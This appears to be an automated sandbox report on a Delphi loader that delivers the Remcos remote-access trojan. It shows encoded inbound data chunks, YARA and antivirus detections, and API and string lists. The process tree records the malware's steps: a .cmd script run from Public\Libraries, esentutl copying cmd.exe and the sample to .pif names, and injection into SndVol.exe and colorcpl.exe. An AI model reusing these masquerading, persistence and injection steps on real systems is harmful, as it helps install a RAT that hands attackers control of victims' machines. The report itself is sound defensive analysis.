2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 74 42 7a 52 46 51 57 54 53 55 6a 63 55 4e 39 49 53 67 59 72 4b 46 6f 64 37 73 65 70 47 4d 57 70 4f 6f 65 43 53 56 35 59 39 38 45 6b 71 2f 41 69 36 4d 6a 76 49 78 41 7a 6d 79 55 64 43 75 77 57 39 42 31 79 70 63 51 4e 77 66 6f 39 52 48 30 59 35 62 4f 34 4f 4a 58 70 46 6d 64 75 72 6f 77 70 59 4b 4a 36 6f 6f 76 4f 72 4b 6c 71 63 54 38 77 30 61 71 39 36 57 75 64 4b 57 63 37 77 77 76 71 4a 44 4d 63 45 64 6c 41 5a 50 59 6d 6d 36 2b 55 58 4a 36 4e 65 6a 74 4b 50 62 71 41 33 78 49 68 66 5a 38 33 6b 55 37 56 4d 78 42 55 4c 47 75 70 45 78 44 6b 48 44 76 52 53 49 62 33 4a 6d 7a 6e 49 6f 75 39 75 45 33 47 47 71 4f 66 31 43 72 47 73 31 62 5a 47 45 68 59 57 68 53 72 59 38 50 63 73 77 6d 48 49 7a 55 59 71 54 6e 34 31 79 47 70 4a 44 39 33 78 75 57 74 65 5a 6d 36 74 4f 4f Data Ascii: tBzRFQWTSUjcUN9ISgYrKFod7sepGMWpOoeCSV5Y98Ekq/Ai6MjvIxAzmyUdCuwW9B1ypcQNwfo9RH0Y5bO4OJXpFmdurowpYKJ6oovOrKlqcT8w0aq96WudKWc7wwvqJDMcEdlAZPYmm6+UXJ6NejtKPbqA3xIhfZ83kU7VMxBULGupExDkHDvRSIb3JmznIou9uE3GGqOf1CrGs1bZGEhYWhSrY8PcswmHIzUYqTn41yGpJD93xuWteZm6tOO
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 4f 36 5a 36 65 2f 53 51 77 50 44 55 37 6e 58 6a 6b 46 59 37 68 2f 62 32 45 6b 44 51 6b 49 6d 78 43 43 49 49 32 72 71 6c 75 49 49 4c 5a 70 66 44 70 6f 6d 75 7a 46 63 6f 65 39 39 39 6b 50 6f 77 74 53 77 73 4b 75 72 67 42 36 6a 36 37 62 49 71 77 4a 63 53 36 31 33 70 73 67 65 52 64 62 44 6b 36 53 52 45 57 39 33 47 73 59 67 49 34 74 73 70 33 4e 30 4e 69 74 56 38 78 48 6f 79 62 2b 35 51 44 4d 72 78 74 68 38 46 6f 67 53 78 52 35 4d 69 4f 56 52 47 35 61 67 64 69 4f 37 54 4b 70 42 52 37 68 58 6c 57 6d 41 38 36 61 41 6e 50 4f 49 32 6a 6d 33 54 32 64 46 45 78 42 76 57 64 37 73 76 48 6d 42 6f 31 31 33 6e 44 4c 70 33 7a 55 75 65 59 31 66 4a 66 45 46 4a 37 5a 74 76 31 33 6b 75 42 64 4e 33 37 41 70 55 5a 59 4c 36 4e 6f 50 69 53 6c 71 53 6b 32 76 70 30 79 4b 6c 64 6c 4c Data Ascii: O6Z6e/SQwPDU7nXjkFY7h/b2EkDQkImxCCII2rqluIILZpfDpomuzFcoe999kPowtSwsKurgB6j67bIqwJcS613psgeRdbDk6SREW93GsYgI4tsp3N0NitV8xHoyb+5QDMrxth8FogSxR5MiOVRG5agdiO7TKpBR7hXlWmA86aAnPOI2jm3T2dFExBvWd7svHmBo113nDLp3zUueY1fJfEFJ7Ztv13kuBdN37ApUZYL6NoPiSlqSk2vp0yKldlL
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 46 56 30 6d 5a 51 33 70 6c 64 53 4f 4a 37 64 59 69 38 30 31 59 68 6e 79 43 4d 5a 64 42 4c 65 64 6b 48 76 68 61 34 50 32 55 66 6f 52 69 56 57 30 62 6e 76 4a 39 6c 5a 54 61 7a 59 33 66 62 4e 6e 69 6e 44 43 2f 48 4f 62 62 4d 65 2f 4c 44 4f 72 35 44 45 55 42 79 71 61 43 64 38 61 39 67 67 43 38 61 53 52 45 4a 64 2b 35 57 72 41 42 71 73 71 73 73 46 64 5a 36 4e 66 47 64 76 38 47 51 4a 58 50 70 47 52 61 4f 65 6e 79 42 57 79 41 74 6d 72 77 39 64 4e 4d 70 46 4e 4c 45 52 6b 6d 61 72 58 65 47 4f 4e 56 67 30 71 6f 59 2b 31 30 55 65 38 39 59 6c 44 30 31 55 6f 43 43 79 33 61 57 32 51 46 54 74 6f 64 34 32 75 4a 7a 54 64 67 34 30 6a 45 76 6c 7a 44 74 75 39 70 54 6c 57 79 65 64 54 50 70 68 7a 72 50 73 38 36 5a 57 51 64 64 39 38 69 6e 70 63 6e 74 77 6c 76 67 48 4b 72 4d 70 Data Ascii: FV0mZQ3pldSOJ7dYi801YhnyCMZdBLedkHvha4P2UfoRiVW0bnvJ9lZTazY3fbNninDC/HObbMe/LDOr5DEUByqaCd8a9ggC8aSREJd+5WrABqsqssFdZ6NfGdv8GQJXPpGRaOenyBWyAtmrw9dNMpFNLERkmarXeGONVg0qoY+10Ue89YlD01UoCCy3aW2QFTtod42uJzTdg40jEvlzDtu9pTlWyedTPphzrPs86ZWQdd98inpcntwlvgHKrMp
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 6b 4a 58 71 4f 67 6c 75 66 33 30 49 61 53 62 4e 31 42 68 77 63 6c 48 74 39 5a 76 78 4b 2f 4b 39 30 6b 61 55 52 48 48 52 4a 73 38 39 72 42 35 7a 64 7a 68 62 76 30 2f 72 59 51 46 6c 4b 50 69 4d 55 34 75 71 67 38 5a 55 57 35 64 34 33 39 6d 76 47 43 53 43 5a 78 72 76 37 6f 32 54 4e 6f 63 71 30 66 6c 43 4d 33 59 4a 78 57 2b 72 32 57 45 5a 70 53 78 72 71 58 7a 37 64 59 77 50 33 32 66 79 58 2b 42 42 74 34 34 50 48 4a 51 61 4d 43 70 5a 75 37 32 46 59 44 74 71 38 50 31 6f 52 59 58 32 4c 63 76 59 4b 30 49 57 66 31 30 76 4a 53 50 2f 34 39 67 32 4c 70 43 79 53 64 63 38 50 30 4b 45 56 6a 6d 2b 57 30 4e 42 53 6d 2b 64 68 49 2f 2f 79 4c 64 71 78 74 72 6e 32 77 55 69 38 49 4a 4a 38 75 73 71 47 54 74 56 50 6e 35 56 41 52 4b 6a 45 2b 63 65 53 4a 2f 6e 6d 4e 63 6c 46 4f 41 Data Ascii: kJXqOgluf30IaSbN1BhwclHt9ZvxK/K90kaURHHRJs89rB5zdzhbv0/rYQFlKPiMU4uqg8ZUW5d439mvGCSCZxrv7o2TNocq0flCM3YJxW+r2WEZpSxrqXz7dYwP32fyX+BBt44PHJQaMCpZu72FYDtq8P1oRYX2LcvYK0IWf10vJSP/49g2LpCySdc8P0KEVjm+W0NBSm+dhI//yLdqxtrn2wUi8IJJ8usqGTtVPn5VARKjE+ceSJ/nmNclFOA
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 58 48 7a 4b 63 34 79 4d 5a 68 34 33 77 70 2f 44 4f 79 44 35 6a 62 2f 39 68 6e 54 64 50 4f 77 54 6c 63 59 46 51 78 64 38 72 34 71 39 69 47 58 39 48 44 65 2b 73 62 48 76 52 33 41 4b 32 4b 53 49 6d 39 5a 42 54 42 43 6c 34 69 65 46 4a 59 4b 73 48 58 64 6b 54 6f 42 6d 47 51 4f 74 75 31 4b 45 6a 47 52 71 76 43 41 48 4e 35 35 53 74 75 68 73 59 4e 53 31 32 46 6c 53 4c 55 50 69 5a 4a 6d 48 6d 76 6a 73 59 4c 6d 79 6c 58 34 6b 6f 69 4b 57 39 38 77 54 4e 7a 2f 51 61 52 77 6a 42 64 69 6c 30 67 71 49 47 36 44 63 6c 7a 4d 55 57 45 70 4e 59 43 51 57 54 36 34 58 70 39 49 76 63 77 70 39 2b 6b 68 5a 6c 4b 79 76 78 6a 39 37 7a 53 55 31 51 64 47 67 33 2b 55 48 39 37 33 6e 4f 52 37 45 39 53 48 72 78 45 5a 67 44 59 41 39 63 49 5a 6e 63 63 4e 7a 4c 6c 70 31 33 54 49 43 2b 2f 59 Data Ascii: XHzKc4yMZh43wp/DOyD5jb/9hnTdPOwTlcYFQxd8r4q9iGX9HDe+sbHvR3AK2KSIm9ZBTBCl4ieFJYKsHXdkToBmGQOtu1KEjGRqvCAHN55StuhsYNS12FlSLUPiZJmHmvjsYLmylX4koiKW98wTNz/QaRwjBdil0gqIG6DclzMUWEpNYCQWT64Xp9Ivcwp9+khZlKyvxj97zSU1QdGg3+UH973nOR7E9SHrxEZgDYA9cIZnccNzLlp13TIC+/Y

Target ID:	0
Start time:	02:13:06
Start date:	26/11/2024
Path:	C:\Users\user\Desktop\1m181Ru74o.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1m181Ru74o.exe"
Imagebase:	0x400000
File size:	1'566'208 bytes
MD5 hash:	06A72BA35AAFF1B3AB0EA4D3E2E65451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:13:15
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" "
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:13:16
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:13:16
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0x9e0000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:13:17
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:	0x9e0000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:13:17
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o
Imagebase:	0x9e0000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:13:17
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:13:17
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\SndVol.exe
Imagebase:	0x290000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	02:13:28
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\Ntmftfld.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Ntmftfld.PIF"
Imagebase:	0x400000
File size:	1'566'208 bytes
MD5 hash:	06A72BA35AAFF1B3AB0EA4D3E2E65451
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:13:30
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0xd40000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:13:37
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\Ntmftfld.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Ntmftfld.PIF"
Imagebase:	0x400000
File size:	1'566'208 bytes
MD5 hash:	06A72BA35AAFF1B3AB0EA4D3E2E65451
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:13:37
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0xd40000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7%
Total number of Nodes:	2000
Total number of Limit Nodes:	20

Executed Functions

Function 02ECF7CC Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02EDB788,?,?,?,00000000,00000000), ref: 02ECF805

Part of subcall function 02ECF6EC: GetModuleHandleW.KERNEL32(KernelBase,?,02ECFAEF,UacInitialize,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,Initialize), ref: 02ECF6F2
Part of subcall function 02ECF6EC: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02ECF704

Part of subcall function 02ECF748: GetModuleHandleW.KERNEL32(KernelBase), ref: 02ECF758
Part of subcall function 02ECF748: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02ECF76A
Part of subcall function 02ECF748: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02ECF781

Part of subcall function 02EB7E6C: GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77

Part of subcall function 02EBC374: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0302B8B8,?,02ED0755,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession), ref: 02EBC38B

Part of subcall function 02ECDD74: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDAF
Part of subcall function 02ECDD74: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDDF
Part of subcall function 02ECDD74: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02ECDDF4
Part of subcall function 02ECDD74: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02ECDE20
Part of subcall function 02ECDD74: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02ECDE29

Part of subcall function 02EB7E90: GetFileAttributesA.KERNEL32(00000000,?,02ED3573,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,Initialize), ref: 02EB7E9B

Part of subcall function 02EB8058: CreateDirectoryA.KERNEL32(00000000,00000000,?,02ED3711,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,Initialize,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC), ref: 02EB8065

Strings

EnumServicesStatusExW, xrefs: 02EDA9E3
FindCertsByIssuer, xrefs: 02ECFC6D
NtQuerySystemInformation, xrefs: 02EDA97A
UacUninitialize, xrefs: 02ED3848, 02ED3BB6
BCryptVerifySignature, xrefs: 02ECFEAD, 02EDA2AA
MiniDumpWriteDump, xrefs: 02ED9252
tquery, xrefs: 02EDA0CA
GetProcessMemoryInfo, xrefs: 02EDA14C
/o, xrefs: 02ED64C4
sppc, xrefs: 02ED9E8A, 02ED9EBD, 02ED9EF0, 02ED9F23, 02EDAE33, 02EDAE66
NtCreateSection, xrefs: 02EDAF4E
C:\Users\Public\, xrefs: 02ED5D8C, 02ED6FF7
NtGetWriteWatch, xrefs: 02EDAE82
SLLoadApplicationPolicies, xrefs: 02ED9F0C
TrustOpenStores, xrefs: 02ECFC07
URL=file:", xrefs: 02ED6D5B
acS, xrefs: 02ED3D06
LdrLoadDll, xrefs: 02EDB04D
DlpGetArchiveFileTraceInfo, xrefs: 02EDA4B7
UacInitialize, xrefs: 02ECFA92, 02ED0159, 02ED089C, 02ED5540, 02ED58F6, 02ED5DE3, 02ED78F1, 02ED9133, 02ED954F
DlpGetWebSiteAccess, xrefs: 02EDA4EA
OpenSession, xrefs: 02ECF89E, 02ECFA2E, 02ED0316, 02ED0437, 02ED0544, 02ED065C, 02ED0A30, 02ED0BCE, 02ED0D74, 02ED0E94, 02ED1029, 02ED1121, 02ED130E, 02ED14B4, 02ED17E2, 02ED1A10, 02ED1B84, 02ED1CA7, 02ED1E25, 02ED21CB, 02ED224E, 02ED2366, 02ED247E, 02ED258A, 02ED27A8, 02ED28C5, 02ED2B64, 02ED2BE0, 02ED2DF5, 02ED2F95, 02ED32D7, 02ED3465, 02ED367F, 02ED3799, 02ED3B3A, 02ED5638, 02ED57D2, 02ED5972, 02ED5B17, 02ED5C8B, 02ED5EDB, 02ED5F8F, 02ED624C, 02ED6344, 02ED67F3, 02ED6ACD, 02ED6C41, 02ED6DD7, 02ED6F87, 02ED7670, 02ED7875, 02ED7A8E, 02ED7B31, 02ED7CC4, 02ED808C, 02ED8328, 02ED8625, 02ED877E, 02ED8924, 02ED8AB1, 02ED8C45, 02ED8DC4, 02ED8EC7, 02ED903B, 02ED92B9, 02ED94A9, 02ED979A, 02ED9920, 02ED9B7B, 02ED9D81, 02ED9F45, 02EDA234, 02EDA2E3, 02EDA523, 02EDA71A, 02EDA812, 02EDACC4, 02EDB28C
VirtualAllocEx, xrefs: 02EDAB10
.url, xrefs: 02ED5D97
NtOpenFile, xrefs: 02EDB0E6
NtQuerySecurityObject, xrefs: 02EDAFE7
VirtualAlloc, xrefs: 02EDAADD
DllRegisterServer, xrefs: 02ECFB58, 02ED00A4
NtOpenProcess, xrefs: 02ED928E
advapi32, xrefs: 02ED9243
CreateProcessAsUserA, xrefs: 02EDAA1F
GZmMS1j, xrefs: 02ECF813
NtAlertResumeThread, xrefs: 02EDA615
WintrustAddActionID, xrefs: 02ECFC3A
BCryptQueryProviderRegistration, xrefs: 02ECFEE0
NtAccessCheck, xrefs: 02EDB01A
spp, xrefs: 02EDA0FD, 02EDA130, 02EDADCD
WriteVirtualMemory, xrefs: 02EDABA9
NtReadVirtualMemory, xrefs: 02EDAFB4
RtlQueryProcessDebugInformation, xrefs: 02EDA9A7
C:\\Users\\Public\\Libraries\\, xrefs: 02ED6173
mssip32, xrefs: 02ECFDAF, 02ECFDE2, 02ECFE15, 02EDA196
CreateProcessW, xrefs: 02EDAA10
ScanBuffer, xrefs: 02ECF9CA, 02ECFD22, 02ECFF4C, 02ED04B3, 02ED05C0, 02ED06D8, 02ED0AAC, 02ED0C4A, 02ED0DF0, 02ED0F10, 02ED10A5, 02ED119D, 02ED1406, 02ED15AC, 02ED1748, 02ED185E, 02ED18EC, 02ED1C00, 02ED1EA1, 02ED1FB2, 02ED214F, 02ED24FA, 02ED2606, 02ED2824, 02ED2941, 02ED2C5C, 02ED2CFD, 02ED2E71, 02ED3031, 02ED3353, 02ED371D, 02ED39BC, 02ED3ABE, 02ED56B4, 02ED59EE, 02ED5D07, 02ED6087, 02ED63C0, 02ED666A, 02ED686F, 02ED69D5, 02ED6B49, 02ED6BC5, 02ED7768, 02ED77F9, 02ED7C29, 02ED7DBC, 02ED7F18, 02ED8010, 02ED852D, 02ED87FA, 02ED89A0, 02ED8B2D, 02ED8CC1, 02ED8E40, 02ED90B7, 02ED91AF, 02ED95CB, 02ED98A4, 02ED9A3D, 02ED9C73, 02ED9D05, 02EDA03D, 02EDA3DB, 02EDA90A, 02EDB210
EtwEventWrite, xrefs: 02EDB14C
EnumProcessModules, xrefs: 02EDA9F2
NtWriteVirtualMemory, xrefs: 02EDB0B3
NtQueryDirectoryFile, xrefs: 02EDA998
can, xrefs: 02ED3D19
DllGetActivationFactory, xrefs: 02ED0071
EnumServicesStatusExA, xrefs: 02EDA9D4
GetProxyDllInfo, xrefs: 02ECFB2E
kernel32, xrefs: 02EDAAF4, 02EDAB27, 02EDAB5A, 02EDAB8D, 02EDABC0, 02EDABF3, 02EDAC26
bcrypt, xrefs: 02ECFEC4, 02ECFEF7, 02ECFF2A, 02EDA2C1
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02ED098E
NtQueryVirtualMemory, xrefs: 02EDAEB5
EtwEventWriteEx, xrefs: 02EDB119
Ntdll, xrefs: 02EDA97F, 02EDA98E, 02EDA99D, 02EDA9AC
MiniDumpReadDumpStream, xrefs: 02ED9266
DlpNotifyPreDragDrop, xrefs: 02EDA451
RtlCreateQueryDebugBuffer, xrefs: 02EDA6E1
SLGatherMigrationBlob, xrefs: 02EDAE1C
ScanString, xrefs: 02ECF966, 02ECFB91, 02ECFCA6, 02ECFE37, 02ECFFC8, 02ED0251, 02ED0392, 02ED0918, 02ED1530, 02ED16CC, 02ED1B08, 02ED1D23, 02ED1D9F, 02ED20BC, 02ED23E2, 02ED26AB, 02ED2AE8, 02ED2F19, 02ED3129, 02ED31DF, 02ED34E1, 02ED3603, 02ED38C4, 02ED55BC, 02ED5756, 02ED5A9B, 02ED5E5F, 02ED64F6, 02ED6CDC, 02ED6E53, 02ED6F0B, 02ED7578, 02ED7A12, 02ED7E79, 02ED849C, 02ED8F43, 02ED9335, 02ED971E, 02ED9AFF, 02ED9DFD, 02EDA1B8, 02EDA59F, 02EDA796, 02EDAD40
SxTracerGetThreadContextDebug, xrefs: 02EDA0E6, 02EDADB6
CreateProcessWithLogonW, xrefs: 02EDAA3D
NtQueryInformationThread, xrefs: 02EDAEE8
